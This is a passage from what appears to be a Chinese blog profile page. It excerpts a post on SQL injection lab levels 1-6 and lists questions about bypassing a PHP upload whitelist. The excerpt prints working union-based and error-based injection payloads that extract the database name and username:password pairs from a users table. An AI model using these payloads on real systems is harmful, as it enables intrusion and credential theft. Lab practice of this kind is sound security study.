- 博客(1)
- 收藏
- 关注
原创 sql注入1-6关
id=1' union select 1,count(*),concat_ws('~',(select concat(username,0x3a,password) from users limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x --+ //运用limit函数进行一个一个的爆错。id=-1’ union select 1,2,database()--+ //爆出数据库的名字。
2023-03-24 18:37:54 43 1
空空如也
自己写的php文件上传,这个php白名单怎么绕过
2023-07-20
sql注入第五关爆数据
2023-03-20
TA创建的收藏夹 TA关注的收藏夹
TA关注的人